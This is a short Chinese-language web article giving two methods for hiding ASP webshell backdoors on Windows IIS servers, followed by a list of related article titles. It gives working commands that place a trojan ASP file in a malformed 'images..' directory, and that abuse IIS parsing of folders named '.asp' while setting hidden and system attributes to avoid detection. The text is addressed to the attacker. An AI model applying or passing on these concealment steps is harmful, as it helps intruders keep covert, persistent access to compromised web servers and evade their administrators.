隐藏ASP木马后门的两种方法

1、建立非标准目录：mkdir images..
拷贝ASP木马至目录：copy c:inetpubwwwrootdbm6.asp c:inetpubwwwrootimages..news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
如何删除非标准目录：rmdir images.. /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容：
新建12.jpg文件内容： 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt

您可能感兴趣的文章:

防范ASP木马的十大基本原则强列建议看下一款不错的asp木马 黑色界面清除网页中iframe木马的利器-淘特ASP木马扫描器asp.net jscript 一句话木马一句话 asp木马加密版 彻底突破杀毒软件更牛的一句话asp木马加密（去掉asp里的%）asp一句话木马原理分析asp,php一句话木马整理方便查找木马有效防止ASP木马上传运行—小知识[网络安全技术]ASP下检测图片木马的函数代码ASP防止图片木马上传的代码一句话木马的原理及利用分析(asp,aspx,php,jsp)aspx超强木马查杀与防范(web网马)如何防范ASP木马